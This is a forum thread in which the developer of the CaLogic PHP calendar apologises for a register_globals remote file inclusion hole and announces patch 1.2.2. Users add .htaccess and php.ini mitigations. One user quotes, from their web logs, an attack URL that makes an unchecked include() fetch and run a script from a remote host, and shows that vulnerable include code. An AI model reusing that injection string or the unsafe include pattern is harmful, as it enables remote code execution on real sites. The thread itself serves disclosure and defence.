Unfortunately users with webspace at providers can't edit their php.ini and register_globals=on is mostly default with providers.

The only way to fix this correctly is to check the input variables everywhere!

My deepest appologies to everyone that was hacked. If it is any conselation, I was hacked too, but not only hacked, my entire web folder was deleted. Thank god for backups!

I have addressed this security issue, and have already released a patch. To patch your CaLogic, download the 1.2.2 distribution zip file, and upload all contents to your CaLogic folder.

If you are using the mini cal plugin, you will need to re-configure the page you are displaying the mini cal in. To do this, please refere to the instructions in the mcpi-demo.php file.

If you do not use the mini calendar plug in, you can also stop the security leak by deleting these 4 files from your CaLogic root folder:

mcconfig.php
clmcpreload.php
mcpi-demo.php
cl_minical.php

I will not be publishing fixes to earlier versions of CaLogic. I will however, fix a previous version if specifically asked to do so. If you continue to use a previous version and are not using the mini cal plugin, then please delete the 4 files as stated above. If however you do use the mini cal plug in, then you should update your CaLogic. If you cannot or dont want to update, then please contact me for a fix of the version you are using.


Once again, please accept my appologies.

Philip Boone

Lets pray that there are no more holes in CaLogic.

----------------
-- there is no spoon

nobody's perfect

what about the isset() instructions? i read that they could be misused too, if the parameters are not checked.

like described here?
http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/

ok, please forgive, it's doing an include after that and the include is the problem we know

calogic is still the best calendar ever seen. anyway i will take my time to let this settle

Thanks

----------------
-- there is no spoon

Under Apache one can disable register_globals

in an .htaccess file per directory with the statement

php_flag register_globals off

But I'm not sure whether commercial providers leave this opportunity to their clients.


Frank

Hi,

i tried Franks great tip, but my provider won't let me set php_flags in .htaccess files.

But they allowed to me to use a php.ini file only containing only the line

register_globals=off

CAUTION!
Unline .htacess the php.ini does NOT work recursively and has to be copied to EVERY directory that should be protected.

Have fun

Andy

Thanks to everyone for all the tipps, help, and above all patience in this matter.

Philip

----------------
-- there is no spoon

My server had php script like this:

www.mydomain.com/index.php?request=abc

and abc was phph scrpt that was included like this:
=======
include header.php
include $request.php
include footer.php
========

From my web logs, my site was called like:
www.mydomain.com/index.php?request=http://f58.aaa.livedoor.jp/~picapau/tool25.dat?&cmd=w

where the funny japanese site has the php script that did all the damage.

I am busy rewriting the index.php.

Hope it helps.

Hi,

as far as I know, CaLogic has no more security / code injection errors. If you find any, please let me know. before the hackers do.. thanks

Philip

----------------
-- there is no spoon